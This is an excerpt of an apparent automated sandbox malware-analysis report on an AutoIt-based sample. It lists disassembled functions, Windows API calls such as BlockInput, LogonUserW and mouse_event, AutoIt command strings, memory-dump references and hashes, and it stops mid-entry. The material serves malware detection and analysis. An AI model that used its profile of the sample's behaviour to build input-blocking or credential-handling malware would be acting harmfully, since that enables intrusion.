                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 24c0fb76f0ff3b2c420d97b145779a42b8ebf332e05e1d4941d8c27e025aa6d9
                                                      • Instruction ID: c728ad0c59fe5ff2ee0c28d8c8a53a2125860c636533b718de2a99da13936f90
                                                      • Opcode Fuzzy Hash: 24c0fb76f0ff3b2c420d97b145779a42b8ebf332e05e1d4941d8c27e025aa6d9
                                                      • Instruction Fuzzy Hash: 23E04F312402149FC710EF99D844A9BF7ECEFA87A0F048026FC4ACB352DA70E8418BA0
                                                      Function 00AC4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00AC4F18
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 6449ad2ad14b6c5b7a2e071570ec41720c84b6e24bafe34dd2670f4f32cf0adf
                                                      • Instruction ID: 088f65529a677ef0f252fa0900ed9aff4bfd022d736f2c2fd525559c749e9525
                                                      • Opcode Fuzzy Hash: 6449ad2ad14b6c5b7a2e071570ec41720c84b6e24bafe34dd2670f4f32cf0adf
                                                      • Instruction Fuzzy Hash: 84D09EB41646057DFC184B20AC3FF761529E358F91F96598D7201994C2D8E56C51B07D
                                                      Function 00AB8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AB88D1), ref: 00AB8CB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 39b7de4e5d9d1e9ffcf4ae86dff03dafac8794573f3cebf2e37a17e6182a1205
                                                      • Instruction ID: e0d9ddd44266c3255b4d32c0be2f024e41491de28f25b92ba84badb0b0b22df1
                                                      • Opcode Fuzzy Hash: 39b7de4e5d9d1e9ffcf4ae86dff03dafac8794573f3cebf2e37a17e6182a1205
                                                      • Instruction Fuzzy Hash: E0D05E3226050EAFEF019EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                      Function 00AA2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00AA2242
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: a798694a602b098e880597d629ac6ba1d545423ae0dd96a3644722ae4c8a2674
                                                      • Instruction ID: 3edc19debc89aac6415c020fc073ba1d37b0143d8d2b6ff31d5c4efb16112a63
                                                      • Opcode Fuzzy Hash: a798694a602b098e880597d629ac6ba1d545423ae0dd96a3644722ae4c8a2674
                                                      • Instruction Fuzzy Hash: 5CC048F1800109EBDB05EBA0DA88DEEB7BCAB08305F2040A6A102F2180E7749B448B71
                                                      Function 00A8A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A8A36A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 8b1f6e60d06d1788b58be21b6989e128c1c59ba39f9a091913ab26afdd67e1ae
                                                      • Instruction ID: a5e9e9b488945c8ec732cf06b3efa03c0b4933147736b44239337124700e05ca
                                                      • Opcode Fuzzy Hash: 8b1f6e60d06d1788b58be21b6989e128c1c59ba39f9a091913ab26afdd67e1ae
                                                      • Instruction Fuzzy Hash: D7A0113000020EAB8A002B82EC08888BFACEA002A0B008020F80C880228B32A8228A80
                                                      Function 00A78A0E Relevance: .6, Instructions: 608COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60b5e2cc9c1d84e54993e890530487a89cddae593030f88c78039c98286f756c
                                                      • Instruction ID: 1bc9ba2b20b8f7c8ca2ac43b19f791331306bdf03ebe1e0b808bb30aa98827b2
                                                      • Opcode Fuzzy Hash: 60b5e2cc9c1d84e54993e890530487a89cddae593030f88c78039c98286f756c
                                                      • Instruction Fuzzy Hash: CD223831E41616CBDF298B24C9987BD77B5EF41340F68C46AD84A8B292DF3C9D81DB60
                                                      Function 00A82405 Relevance: .3, Instructions: 345COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: eb0a44863e1ffd22e06cfb90e0fd15258d6b50390b2af27b6ef785f3ed8c0902
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 7DC183322051A30ADF2D573A943423EBAE55EA27B131A076EE4B3CB5D4FF24D925D720
                                                      Function 00A8283A Relevance: .3, Instructions: 341COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 13049ee97f6ccb4093fbe5beced7439f0f133314024e0c4b2a87e22f4a0d59b9
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 1DC182322051A309DF6D573A843423EBBE15FA27B131A076EE4B2DB5D4EF24D925E720
                                                      Function 00A81BB8 Relevance: .3, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 78872bf357d90fbe5a8786674a2b667d6027be084c1d88797e7641f03cc8a0b0
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 7FC195322051A309DF2D5739D43413EBBE95AA27B131A0B6EE4B3CB5D4EF24D926D710
                                                      Function 03D83640 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 73b5d006b4d3a479d28b78202b73ac22d6260a9b7fa1fd5194d4fccbc50b65d6
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: F041C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                                      Function 03D834D0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 96a41bbd466e54172d8126653791e5937374a11b316d61018fb4f8874d35676b
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 3E019278A01209EFCB45EF98C5909AEF7B5FB48710F2485D9D809A7701D730EE41DB80
                                                      Function 03D83530 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: 1f18df39597290a3d79eb19a84275c3b21e03e4dcb868a630b499c6344dd7098
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: 1B018078A05209EFCB45EF98C5909AEF7B5FB48710B2485D9D809A7701D730EE41DB80
                                                      Function 03D81ED0 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      Function 00AD7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00AD7B70
                                                      • DeleteObject.GDI32(00000000), ref: 00AD7B82
                                                      • DestroyWindow.USER32 ref: 00AD7B90
                                                      • GetDesktopWindow.USER32 ref: 00AD7BAA
                                                      • GetWindowRect.USER32(00000000), ref: 00AD7BB1
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AD7CF2
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AD7D02
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7D4A
                                                      • GetClientRect.USER32(00000000,?), ref: 00AD7D56
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AD7D90
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DB2
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DC5
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DD0
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DD9
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DE8
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DF1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DF8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00AD7E03
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7E15
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AF2CAC,00000000), ref: 00AD7E2B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00AD7E3B
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AD7E61
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AD7E80
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7EA2
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD808F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 8c506479b0e283f8c6ca620dc618724355865025bd2f767fd1fcc96f6399aaea
                                                      • Instruction ID: b8e8af37f7ca2f367cc55156ed1cedc45f985a625f1e55ed98e5cdba0c1bd55b
                                                      • Opcode Fuzzy Hash: 8c506479b0e283f8c6ca620dc618724355865025bd2f767fd1fcc96f6399aaea
                                                      • Instruction Fuzzy Hash: B3027B71900259EFDF14DFA4CD89EAE7BB9FB48310F148159F916AB2A1DB70AD01CB60
                                                      Function 00AE37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,00AEF910), ref: 00AE38AF
                                                      • IsWindowVisible.USER32(?), ref: 00AE38D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: 984a947e3805967f956a16474b070ef76a5b9f9c8129d78fc9feb3537877baff
                                                      • Instruction ID: 387a7ba0ac6d439a2eb9900576a64fdb15029b5ef8120a3f22e4d2b475d02201
                                                      • Opcode Fuzzy Hash: 984a947e3805967f956a16474b070ef76a5b9f9c8129d78fc9feb3537877baff
                                                      • Instruction Fuzzy Hash: 5BD150322043459FCF54EF11C655EAEB7E6AF98344F548458B8865B3A3CB31EE4ACB81
                                                      Function 00AEA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00AEA89F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00AEA8D0
                                                      • GetSysColor.USER32(0000000F), ref: 00AEA8DC
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00AEA8F6
                                                      • SelectObject.GDI32(?,?), ref: 00AEA905
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AEA930
                                                      • GetSysColor.USER32(00000010), ref: 00AEA938
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00AEA93F
                                                      • FrameRect.USER32(?,?,00000000), ref: 00AEA94E
                                                      • DeleteObject.GDI32(00000000), ref: 00AEA955
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00AEA9A0
                                                      • FillRect.USER32(?,?,?), ref: 00AEA9D2
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AEA9FD
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(00000012), ref: 00AEAB99
                                                        • Part of subcall function 00AEAB60: SetTextColor.GDI32(?,?), ref: 00AEAB9D
                                                        • Part of subcall function 00AEAB60: GetSysColorBrush.USER32(0000000F), ref: 00AEABB3
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(0000000F), ref: 00AEABBE
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(00000011), ref: 00AEABDB
                                                        • Part of subcall function 00AEAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AEABE9
                                                        • Part of subcall function 00AEAB60: SelectObject.GDI32(?,00000000), ref: 00AEABFA
                                                        • Part of subcall function 00AEAB60: SetBkColor.GDI32(?,00000000), ref: 00AEAC03
                                                        • Part of subcall function 00AEAB60: SelectObject.GDI32(?,?), ref: 00AEAC10
                                                        • Part of subcall function 00AEAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00AEAC2F
                                                        • Part of subcall function 00AEAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AEAC46
                                                        • Part of subcall function 00AEAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00AEAC5B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 8326bfc5a4085384f24a2a65c394cb156a931c8f893fc8640af16ebf63825337
                                                      • Instruction ID: d81c9b2c133d45d49eb8750e689fd85bc314d935b9141447e44fcbff555bb377
                                                      • Opcode Fuzzy Hash: 8326bfc5a4085384f24a2a65c394cb156a931c8f893fc8640af16ebf63825337
                                                      • Instruction Fuzzy Hash: F7A18072008385AFD710DFA5DC48A6B7BA9FF98321F104B29F9629A1A1D730E945CB52
                                                      Function 00A62C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 00A62CA2
                                                      • DeleteObject.GDI32(00000000), ref: 00A62CE8
                                                      • DeleteObject.GDI32(00000000), ref: 00A62CF3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00A62CFE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00A62D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A9C68B
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A9C6C4
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A9CAED
                                                        • Part of subcall function 00A61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A62036,?,00000000,?,?,?,?,00A616CB,00000000,?), ref: 00A61B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 00A9CB2A
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A9CB41
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A9CB57
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A9CB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
